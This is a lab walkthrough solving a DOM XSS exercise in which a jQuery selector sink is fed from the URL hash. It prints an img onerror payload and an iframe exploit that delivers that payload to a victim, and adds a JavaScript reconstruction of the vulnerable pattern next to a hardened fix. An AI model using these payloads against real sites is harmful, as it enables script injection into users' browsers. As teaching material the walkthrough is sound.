6) DOM XSS in jQuery selector sink using a hashchange event
Looking at the home page source code reveals an interesting script: it listens for changes to the URL hash (the hashchange event) and then tries to scroll the blog post whose title matches the hash value into view.
Let's supply a hash value in the URL and see what happens.
Nothing visibly changes on the page, but the browser console shows that an invalid hash value (a non-existent title) triggers an error.
So what we can do is place an XSS payload in the hash value and, to get the payload executed, make it run on an error event.
Since an invalid hash value (a non-existent title) triggers an error, this payload will be executed:
<img src=x onerror="alert(1)">
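To show why a fragment string ends up creating an img element at all, here is an added example (not the lab's own code): a reconstruction of the vulnerable pattern the walkthrough describes, where the decoded fragment is concatenated into a jQuery :contains() selector, beside a hardened lookup that never builds a selector from the fragment. The quick-expression regex is the one jQuery used before 1.9, in which a "<...>" anywhere in the string makes $() parse it as HTML instead of a selector; the post titles are constructed sample data.

```javascript
// Added example, not the lab's own code. Reconstructs the sink pattern
// described above (fragment concatenated into a jQuery selector) and a
// hardened replacement; no jQuery is needed, so it runs under Node.

// Pre-1.9 jQuery quick-expression (assumption from jQuery's init() source).
// Group 1 is set when $() treats the string as HTML markup, which is what
// turns a selector containing "<img ...>" into a created img element.
const LEGACY_QUICK_EXPR = /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/;

// Would a legacy jQuery $() call parse this string as HTML rather than a selector?
function treatedAsHtml(str) {
  const m = LEGACY_QUICK_EXPR.exec(str);
  return !!(m && m[1]);
}

// Vulnerable pattern: the decoded fragment is concatenated into the selector.
function buildSelectorUnsafe(hash) {
  const title = decodeURIComponent(hash.replace(/^#/, ''));
  return 'section.blog-list h2:contains(' + title + ')';
}

// Hardened replacement: look the title up by exact text comparison against
// the heading texts instead of building a selector. `titles` stands in for
// the text of each h2 on the page; returns the index or -1 if none matches.
function findPostIndex(titles, hash) {
  const wanted = decodeURIComponent(hash.replace(/^#/, '')).trim();
  if (wanted === '') return -1;
  return titles.findIndex((t) => t.trim() === wanted);
}

// Constructed sample data for a stand-alone run.
const SAMPLE_TITLES = ['Faking It!', 'The Reverse Bucket List'];
const PAYLOAD_HASH = '#<img src=x onerror=alert(1)>';

console.log(treatedAsHtml(buildSelectorUnsafe('#Faking It!')));   // false
console.log(treatedAsHtml(buildSelectorUnsafe(PAYLOAD_HASH)));    // true
console.log(findPostIndex(SAMPLE_TITLES, '#The Reverse Bucket List')); // 1
console.log(findPostIndex(SAMPLE_TITLES, PAYLOAD_HASH));          // -1
```

Note that the fragment is never sent to the server, so request logs will not show it; the fix has to be made in the client-side script itself.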
There is an exploit server that I can use to prepare and deliver a custom-made page. So I can create a page containing an iframe that points at the vulnerable page; with an onload event I change the fragment, which in turn triggers the hashchange event.
<iframe src="https://0a74002203903b238482b4ac00170065.web-security-academy.net/#" onload="this.src+='<img src=x onerror=alert(1)>'"></iframe>
Detailed explanation of the code:
<iframe src="https://0a74002203903b238482b4ac00170065.web-security-academy.net/#">
In this line an iframe is created and its src attribute is set to the lab URL. The URL ends with a # symbol, which starts the fragment identifier, the part of the URL that the hashchange handler reads.
onload="this.src+='<img src=x onerror=alert(1)>'"
The onload event fires when the iframe's content has fully loaded. At that point the this.src expression appends the payload to the iframe's src attribute, which changes the fragment; the modification injects the malicious img tag into the site loaded inside the iframe.
Now go to the exploit server, paste the exploit into the body, store it and then deliver it to the victim (make sure you execute print() to solve the lab).
And we have solved the lab.